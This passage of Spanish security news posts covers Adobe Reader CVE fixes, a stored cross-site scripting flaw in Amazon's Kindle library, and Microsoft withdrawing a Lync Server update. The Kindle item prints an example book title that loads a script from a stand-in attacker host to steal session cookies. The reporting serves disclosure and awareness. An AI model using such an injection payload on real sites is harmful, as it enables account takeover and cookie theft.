Esta actualización soluciona una vulnerabilidad de uso después de liberar memoria que podría permitir la ejecución de código (CVE-2014-0560), una vulnerabilidad de universal cross-site scripting (UXSS) en la plataforma Macintosh (CVE-2014-0562), una corrupción de memoria que podría dar lugar a condiciones de denegación de servicio (CVE-2014-0563), desbordamientos de búfer que podrían permitir la ejecución de código (CVE-2014-0561, CVE-2014-0567), corrupción de memoria que podrían dar lugar a ejecución de código (CVE-2014-0565, CVE-2014-0566) y un salto de la sandbox que podría permitir la ejecución de código con privilegios elevados en Windows (CVE-2014-0568).

Para corregir estos problemas Adobe ha publicado las versiones Adobe Reader XI 11.0.09 y Adobe Reader X 10.1.12 para Windows and Macintosh, se recomienda actualizar a estas versiones empleando la opción de actualización automática de los productos o bien descargándolas desde la propia web de Adobe: http://www.adobe.com/downloads/.

Más información:

Security updates available for Adobe Reader and Acrobat





Antonio Ropero

Twitter: @aropero

martes, 16 de septiembre de 2014

Vulnerabilidad en Kindle permite obtener detalles de la cuenta de usuario

Se ha anunciado una vulnerabilidad en el software del Kindle de Amazon que podría permitir a un atacante acceder a todos los detalles de una cuenta de Amazon.

El problema reside en un cross-site scripting almacenado, la más peligrosa de todas las formas de este tipo de ataques, en la librería Kindle de Amazon, en las páginas conocidas como "Manage Your Content and Devices" y "Manage your Kindle". El fallo se produce al descargar un libro electrónico desde un sitio que no sea la propia web de Amazon, y podría permitir inyectar código malicioso a través de los metadatos del libro (por ejemplo el título).

El atacante podrá crear un libro con un título como
<script src="https://www.atacante.org/script.js"></script>
Una vez que la víctima descargue el libro y lo tenga añadido a su librería, el código se ejecutara en el momento en que la víctima abra la página web de la librería del Kindle. Como resultado, el atacante podrá acceder y transferir las cookies de sesión de Amazón, por lo que la cuenta quedará comprometida. Existe disponible una prueba de concepto del problema.

Lo más sorprendente es que según Benjamin Daniel Mussler, investigador que ha dado a conocer el problema, reportó el problema a Amazon en noviembre de 2013 y fue corregido poco después. Sin embargo confirma que, hace dos meses, al publicar una nueva versión de la aplicación web "Manage your Kindle" se ha reintroducido la vulnerabilidad. Según confirma no ha obtenido respuesta a ninguna de sus comunicaciones.

Más información:

Amazon.com Stored XSS via Book Metadata



Antonio Ropero
Twitter: @aropero


lunes, 15 de septiembre de 2014

Nuevo problema en las actualizaciones de Microsoft

Por segundo mes consecutivo Microsoft se ha visto obligado a retirar del centro de descargas una de las actualizaciones publicadas dentro del conjunto de boletines de seguridad publicado el pasado martes. En esta ocasión los problemas se han dado con el boletín MS14-055 en servidores Microsoft Lync Server 2010.

Microsoft ha retirado la actualización 2982385 para Microsoft Lync Server 2010 perteneciente al boletín MS14-045 del "Download Center". Este boletín estaba calificado como "importante" y solucionaba tres vulnerabilidades que podrían permitir a un atacante provocar denegaciones de servicio en servidores Lync 2010 y 2013. En esta ocasión parece que los problemas solo se dan en servidores Lync 2010.

Microsoft ha indicado que ha retirado la actualización debido a que algunos usuarios no han podido llegar a instalar correctamente la actualización 2982385 para Microsoft Lync Server 2010. Según han reportado algunos usuarios de Lync 2010 han sufrido problemas en el servidor Edge al haber instalado la actualización KB2953590 para OCSCore pero no poder instalar correctamente la actualización 2982385 para Lync Server.

Dentro de unos días, tal y como ocurrió el pasado mes con la actualización MS14-045 Microsoft volverá a publicar la actualización con todos los problemas ya solucionados. Aunque estos dos problemas se han dado en productos y configuraciones muy determinados y poco habituales, no deja de ser preocupante que el mismo suceso haya ocurrido por dos meses consecutivos. Microsoft establece grandes controles antes de publicar un parche, resulta complejo evaluar una actualización en todas las posibles configuraciones, idiomas, versiones, etc. Pero esperamos, por la tranquilidad de todos, que este tipo de problemas no se vuelvan a repetir.

Más información:

una-al-dia (17/08/2014) Microsoft recomienda desinstalar la actualización MS14-045

MS14-055 Broke My Edge Server

Microsoft Security Bulletin MS14-055 - Important
Vulnerabilities in Microsoft Lync Server Could Allow Denial of Service (2990928)

una-al-dia (09/09/2014) Boletines de seguridad de Microsoft de septiembre

una-al-dia (27/08/2014) Microsoft vuelve a publicar la actualización MS14-045


Antonio Ropero

Twitter: @aropero